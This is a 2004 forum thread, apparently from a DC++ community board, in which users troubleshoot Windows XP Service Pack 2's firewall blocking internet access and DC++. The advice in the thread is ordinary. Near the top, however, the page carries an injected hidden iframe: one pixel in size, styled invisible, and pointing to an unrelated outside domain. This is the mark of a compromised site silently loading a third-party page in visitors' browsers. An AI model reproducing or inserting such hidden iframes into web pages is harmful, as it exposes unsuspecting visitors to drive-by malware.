Windows XP Service Pack 2

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

spacelordmf

Windows XP Service Pack 2

Post by spacelordmf » 2004-09-20 06:53

Hey guys !
Might be the "wrong forum" but you brainees allways has good answers to everything so I thought I'd try you.
I installed (by beeing stupid and running XP under automatic update bla bla..) this new service pack (SP 2) on saturday and since then my world has looked "pearshaped" to say the least. Cannot access internet exept a few pagers and (natch) cannot log on to the superb DC++. I have tried alot and realized that SP2 installes a firewall. Now to my question : Does annybody know if this new firewall is the culprit or is the whole SP 2 filled with bugs and should be uninstalled ?

Regards
Space-Lord
"No can do. I will be dining with Penelope tonite"

Guitarm
Forum Moderator

Re: Windows XP Service Pack 2

Post by Guitarm » 2004-09-20 10:02

spacelordmf wrote:Does annybody know if this new firewall is the culprit or is the whole SP 2 filled with bugs and should be uninstalled ?
No, my guess would be that a company releasing a service pack is (hopefully) out to fix some bugs.

What you need to do is configure your firewall (hint : controlpanel) so that it accepts incoming/outgoing traffic for your various applications.
"Nothing really happens fast. Everything happens at such a rate that by the time it happens, it all seems normal."

spacelordmf

Post by spacelordmf » 2004-09-22 01:45

Thanks Guitarm,

I have tried that but realize that Servicepack is full of bugs (according to their own support) I will have to do a reinstallement of all my programs from start and I for one does not like the sound of that... Thanks for your answer annyway mate. I like your Strata as well mate but I am more of a Les Paul : er myself ! hehe :-)
"No can do. I will be dining with Penelope tonite"

GargoyleMT
DC++ Contributor

Post by GargoyleMT » 2004-09-22 14:22

spacelordmf wrote:I have tried that but realize that Servicepack is full of bugs (according to their own support) I will have to do a reinstallement of all my programs from start and I for one does not like the sound of that...
Hmm? I haven't had any real problems with SP2. Specifically, I've had no problems that require reinstalling of programs.

SP2 actually fixes bus in my experience, such as the exact wrong items being aged out on the start menu, and the folder views in Explorer not sticking.

Guitarm
Forum Moderator

Post by Guitarm » 2004-09-22 15:09

Hmm, I having serious doubts about ms support admitting to having a SP2 "full of bugs".
I do SP2 and I have not re-installed any software.

Btw, Les-Paul's are to heavy, mensur is wrong and I don't like humbuckers compared to single-coils.
But that's things not belonging in this forum. Case closed
"Nothing really happens fast. Everything happens at such a rate that by the time it happens, it all seems normal."

yakko

Post by yakko » 2004-09-22 18:39

the biggest problem with SP2 is users not realizing that the firewall will pop up a box that asks if a program can access the internet, then when they see the box they don't read it and click block, then complain that the SP broke their program. Go to the firewall section in the control panel and you can give the programs access again.

vellu

Post by vellu » 2004-10-20 01:07

Doesn't the latest DC++ version include UPNP support to configure the windows firewall automatically? Haven't tried it myself though, since I use Sygate.